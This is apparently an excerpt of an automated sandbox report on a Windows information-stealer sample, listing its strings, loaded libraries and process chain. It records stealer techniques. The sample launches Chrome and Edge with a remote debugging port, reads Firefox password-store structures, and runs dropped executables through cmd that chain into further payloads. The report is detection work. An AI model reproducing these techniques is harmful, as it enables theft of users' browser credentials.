Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CBA3620 appears 42 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CB194D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CBA9B10 appears 35 times
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.2651081416.00000000236C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs file.exe
Source: file.exe, 00000000.00000002.2651081416.00000000236C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs file.exe
Source: file.exe, 00000000.00000002.2655951724.000000006CD55000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2655235257.000000006CB62000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: mvlkjrdz ZLIB complexity 0.9947767618666056
Source: random[1].exe.0.dr Static PE information: Section: mvlkjrdz ZLIB complexity 0.9947767618666056
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@89/247@35/19
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB37030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6CB37030
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\329Q2QML.htm Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5664:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe File created: C:\Users\user\AppData\Local\Temp\02533b41-b3dd-47cf-9cab-2d2d0f630af7.tmp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2648044779.000000001D696000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2655673154.000000006CD0F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2654763367.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2648044779.000000001D696000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2655673154.000000006CD0F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2654763367.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2648044779.000000001D696000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2655673154.000000006CD0F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2654763367.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2648044779.000000001D696000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2655673154.000000006CD0F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2654763367.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, file.exe, 00000000.00000002.2648044779.000000001D696000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2655673154.000000006CD0F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2654763367.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2648044779.000000001D696000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2654763367.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2648044779.000000001D696000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2655673154.000000006CD0F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2654763367.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2316365983.000000001D595000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2394302597.000000001D589000.00000004.00000020.00020000.00000000.sdmp, CGIDGCGIEGDGDGDGHJKK.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2648044779.000000001D696000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2654763367.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2648044779.000000001D696000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2654763367.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2020,i,2579233296112613996,7576974820775269714,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2532 --field-trial-handle=2368,i,8315494591185384419,3277572729580263378,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2548 --field-trial-handle=2536,i,717750146961907579,3352193052425683844,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6132 --field-trial-handle=2536,i,717750146961907579,3352193052425683844,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6132 --field-trial-handle=2536,i,717750146961907579,3352193052425683844,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7124 --field-trial-handle=2536,i,717750146961907579,3352193052425683844,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7284 --field-trial-handle=2536,i,717750146961907579,3352193052425683844,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsCBAKJEHDBG.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\DocumentsCBAKJEHDBG.exe "C:\Users\user\DocumentsCBAKJEHDBG.exe"
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe "C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6472 --field-trial-handle=2536,i,717750146961907579,3352193052425683844,262144 /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe "C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe "C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe "C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe "C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe "C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5752 --field-trial-handle=2536,i,717750146961907579,3352193052425683844,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsCBAKJEHDBG.exe" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2020,i,2579233296112613996,7576974820775269714,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2532 --field-trial-handle=2368,i,8315494591185384419,3277572729580263378,262144 /prefetch:3 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2548 --field-trial-handle=2536,i,717750146961907579,3352193052425683844,262144 /prefetch:3 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6132 --field-trial-handle=2536,i,717750146961907579,3352193052425683844,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe "C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe" Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6132 --field-trial-handle=2536,i,717750146961907579,3352193052425683844,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7124 --field-trial-handle=2536,i,717750146961907579,3352193052425683844,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7284 --field-trial-handle=2536,i,717750146961907579,3352193052425683844,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6472 --field-trial-handle=2536,i,717750146961907579,3352193052425683844,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5752 --field-trial-handle=2536,i,717750146961907579,3352193052425683844,262144 /prefetch:8 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\DocumentsCBAKJEHDBG.exe "C:\Users\user\DocumentsCBAKJEHDBG.exe"
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe "C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe "C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe"
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll Jump to behavior
